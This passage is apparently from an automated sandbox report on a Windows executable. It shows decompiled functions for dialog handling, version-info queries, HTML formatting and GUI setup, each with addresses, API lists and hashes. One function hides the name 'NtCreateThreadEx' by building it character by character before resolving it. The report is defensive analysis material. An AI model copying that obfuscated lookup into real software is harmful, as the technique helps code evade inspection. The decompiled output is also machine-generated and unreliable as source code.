				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                        0x00408ae3
                                                                                                        0x00408aeb
                                                                                                        0x00408af3
                                                                                                        0x00408b76
                                                                                                        0x00408b8a
                                                                                                        0x00408b91
                                                                                                        0x00408b98
                                                                                                        0x00408bb1
                                                                                                        0x00408bb3
                                                                                                        0x00408bc6
                                                                                                        0x00408bcc
                                                                                                        0x00408bda
                                                                                                        0x00408be0
                                                                                                        0x00408bf3
                                                                                                        0x00408bfa
                                                                                                        0x00408c0b
                                                                                                        0x00408c12
                                                                                                        0x00408c17
                                                                                                        0x00408c1a
                                                                                                        0x00408c2c
                                                                                                        0x00408c39
                                                                                                        0x00408c3d
                                                                                                        0x00408c3f
                                                                                                        0x00408c41
                                                                                                        0x00408c52
                                                                                                        0x00408c58
                                                                                                        0x00408c58
                                                                                                        0x00408c6f
                                                                                                        0x00408c71
                                                                                                        0x00408c73
                                                                                                        0x00408c83
                                                                                                        0x00408c89
                                                                                                        0x00408c89
                                                                                                        0x00408c8a
                                                                                                        0x00408c8f
                                                                                                        0x00408c91
                                                                                                        0x00408c9a
                                                                                                        0x00408c93
                                                                                                        0x00408c93
                                                                                                        0x00408c93
                                                                                                        0x00408c9f
                                                                                                        0x00408ca5
                                                                                                        0x00408caf
                                                                                                        0x00408cbc
                                                                                                        0x00408cc2
                                                                                                        0x00408cc7
                                                                                                        0x00408ccd
                                                                                                        0x00408cd0
                                                                                                        0x00408cd6
                                                                                                        0x00408cd7
                                                                                                        0x00408cd8
                                                                                                        0x00408cde
                                                                                                        0x00408ce3
                                                                                                        0x00408ceb
                                                                                                        0x00408cfe
                                                                                                        0x00408d03
                                                                                                        0x00408d06
                                                                                                        0x00408d0c
                                                                                                        0x00408d21
                                                                                                        0x00408d27
                                                                                                        0x00408d0c
                                                                                                        0x00000000
                                                                                                        0x00408ca7
                                                                                                        0x00408ca7
                                                                                                        0x00408cad
                                                                                                        0x00408d28
                                                                                                        0x00408d2e
                                                                                                        0x00408d35
                                                                                                        0x00408d36
                                                                                                        0x00408d42
                                                                                                        0x00408d48
                                                                                                        0x00408d4e
                                                                                                        0x00408d54
                                                                                                        0x00408d5a
                                                                                                        0x00408d60
                                                                                                        0x00408d66
                                                                                                        0x00408d6c
                                                                                                        0x00408d72
                                                                                                        0x00408d73
                                                                                                        0x00408d7f
                                                                                                        0x00408d85
                                                                                                        0x00408d8a
                                                                                                        0x00408d8f
                                                                                                        0x00408d90
                                                                                                        0x00408da8
                                                                                                        0x00408db9
                                                                                                        0x00408dbf
                                                                                                        0x00408dc5
                                                                                                        0x00408dc5
                                                                                                        0x00000000
                                                                                                        0x00408cad
                                                                                                        0x00408ca5
                                                                                                        0x00408af6
                                                                                                        0x00408afc
                                                                                                        0x00408b07
                                                                                                        0x00408b2a
                                                                                                        0x00408b38
                                                                                                        0x00408b53
                                                                                                        0x00408b56
                                                                                                        0x00408b62
                                                                                                        0x00408b6a
                                                                                                        0x00408b6a
                                                                                                        0x00408b2a
                                                                                                        0x00408b07
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • {Unknown}, xrefs: 00408BA5
                                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                        • API String ID: 4111938811-1819279800
                                                                                                        • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                        • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                        • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                        • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                        0x0040b04d
                                                                                                        0x0040b05e
                                                                                                        0x0040b060
                                                                                                        0x0040b063
                                                                                                        0x0040b06a
                                                                                                        0x0040b06d
                                                                                                        0x0040b076
                                                                                                        0x0040b07b
                                                                                                        0x0040b07e
                                                                                                        0x0040b084
                                                                                                        0x0040b08e
                                                                                                        0x0040b0a8
                                                                                                        0x0040b0aa
                                                                                                        0x0040b0ad
                                                                                                        0x0040b0b0
                                                                                                        0x0040b0b3
                                                                                                        0x0040b0b6
                                                                                                        0x0040b0b8
                                                                                                        0x0040b0bb
                                                                                                        0x0040b0be
                                                                                                        0x0040b0c1
                                                                                                        0x0040b0c4
                                                                                                        0x0040b0c7
                                                                                                        0x0040b0ca
                                                                                                        0x0040b0cd
                                                                                                        0x0040b0cd
                                                                                                        0x0040b0e5
                                                                                                        0x0040b11f
                                                                                                        0x0040b128
                                                                                                        0x0040b0e7
                                                                                                        0x0040b0e7
                                                                                                        0x0040b0f1
                                                                                                        0x0040b0f2
                                                                                                        0x0040b0f3
                                                                                                        0x0040b0fb
                                                                                                        0x0040b0fd
                                                                                                        0x0040b0fe
                                                                                                        0x0040b11d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040b11d
                                                                                                        0x0040b13c
                                                                                                        0x0040b151
                                                                                                        0x0040b166
                                                                                                        0x0040b17b
                                                                                                        0x0040b190
                                                                                                        0x0040b1a5
                                                                                                        0x0040b1ba
                                                                                                        0x0040b1cf
                                                                                                        0x0040b1d6
                                                                                                        0x0040b1d7
                                                                                                        0x0040b1d8
                                                                                                        0x0040b1de
                                                                                                        0x0040b1e3

                                                                                                        APIs
                                                                                                        • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                        • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                        • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                        • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                        • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                        • wcscpy.MSVCRT ref: 0040B128
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                        • API String ID: 1223191525-1542517562
                                                                                                        • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                        • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                        • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                        • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                        0x0040a1f8
                                                                                                        0x0040a26d
                                                                                                        0x00000000
                                                                                                        0x0040a26f
                                                                                                        0x0040a205
                                                                                                        0x0040a20b
                                                                                                        0x0040a20d
                                                                                                        0x0040a213
                                                                                                        0x0040a214
                                                                                                        0x0040a215
                                                                                                        0x0040a216
                                                                                                        0x0040a217
                                                                                                        0x0040a219
                                                                                                        0x0040a21f
                                                                                                        0x0040a223
                                                                                                        0x0040a227
                                                                                                        0x0040a22b
                                                                                                        0x0040a22f
                                                                                                        0x0040a233
                                                                                                        0x0040a237
                                                                                                        0x0040a23b
                                                                                                        0x0040a23f
                                                                                                        0x0040a243
                                                                                                        0x0040a247
                                                                                                        0x0040a24b
                                                                                                        0x0040a24f
                                                                                                        0x0040a253
                                                                                                        0x0040a257
                                                                                                        0x0040a25b
                                                                                                        0x0040a25f
                                                                                                        0x0040a269
                                                                                                        0x00000000
                                                                                                        0x0040a26c
                                                                                                        0x0040a271

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                        • API String ID: 2574300362-1257427173
                                                                                                        • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                        • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                        • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                        • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 63%
                                                                                                        			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                        0x00407f9b
                                                                                                        0x00407fa3
                                                                                                        0x00407fad
                                                                                                        0x00407fb9
                                                                                                        0x0040802e
                                                                                                        0x00408032
                                                                                                        0x00408038
                                                                                                        0x0040803e
                                                                                                        0x00407fbb
                                                                                                        0x00407fc9
                                                                                                        0x00407fd0
                                                                                                        0x00407fe0
                                                                                                        0x00407fe5
                                                                                                        0x00407ff7
                                                                                                        0x00408015
                                                                                                        0x0040801b
                                                                                                        0x00408021
                                                                                                        0x00408021
                                                                                                        0x00408051
                                                                                                        0x00408051
                                                                                                        0x00408059
                                                                                                        0x00408065
                                                                                                        0x00408069
                                                                                                        0x0040806f
                                                                                                        0x00408087
                                                                                                        0x00408087
                                                                                                        0x0040809c
                                                                                                        0x004080bb
                                                                                                        0x004080d1
                                                                                                        0x004080de
                                                                                                        0x004080e2
                                                                                                        0x004080ea
                                                                                                        0x004080fb
                                                                                                        0x00408105
                                                                                                        0x00408115
                                                                                                        0x00408121
                                                                                                        0x00408127
                                                                                                        0x00408150

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00407FD0
                                                                                                        • memset.MSVCRT ref: 00407FE5
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                        • LoadImageW.USER32 ref: 004080B4
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                        • LoadImageW.USER32 ref: 004080D1
                                                                                                        • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                        • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                        • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                        • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                        • DeleteObject.GDI32(?), ref: 00408121
                                                                                                        • DeleteObject.GDI32(?), ref: 00408127
                                                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 304928396-0
                                                                                                        • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                        • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                        • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                        • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 69%
                                                                                                        			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                        0x0040ae90
                                                                                                        0x0040aeab
                                                                                                        0x0040aeb2
                                                                                                        0x0040aec0
                                                                                                        0x0040aec7
                                                                                                        0x0040aecc
                                                                                                        0x0040aed3
                                                                                                        0x0040aeda
                                                                                                        0x0040aee1
                                                                                                        0x0040aee1
                                                                                                        0x0040aee7
                                                                                                        0x0040aeea
                                                                                                        0x0040aeed
                                                                                                        0x0040aef9
                                                                                                        0x0040aefe
                                                                                                        0x0040af05
                                                                                                        0x0040af07
                                                                                                        0x0040af08
                                                                                                        0x0040af13
                                                                                                        0x0040af18
                                                                                                        0x0040af19
                                                                                                        0x0040af26
                                                                                                        0x0040af2b
                                                                                                        0x0040af2b
                                                                                                        0x0040af2e
                                                                                                        0x0040af34
                                                                                                        0x0040af43
                                                                                                        0x0040af44
                                                                                                        0x0040af4f
                                                                                                        0x0040af54
                                                                                                        0x0040af55
                                                                                                        0x0040af62
                                                                                                        0x0040af67
                                                                                                        0x0040af70
                                                                                                        0x0040af76
                                                                                                        0x0040af7a
                                                                                                        0x0040af82
                                                                                                        0x0040af88
                                                                                                        0x0040af8d
                                                                                                        0x0040af97
                                                                                                        0x0040af9f
                                                                                                        0x0040afa5
                                                                                                        0x0040afa9
                                                                                                        0x0040afb1
                                                                                                        0x0040afb7
                                                                                                        0x0040afbd

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                        • API String ID: 3143752011-1996832678
                                                                                                        • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                        • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                        • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                        • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
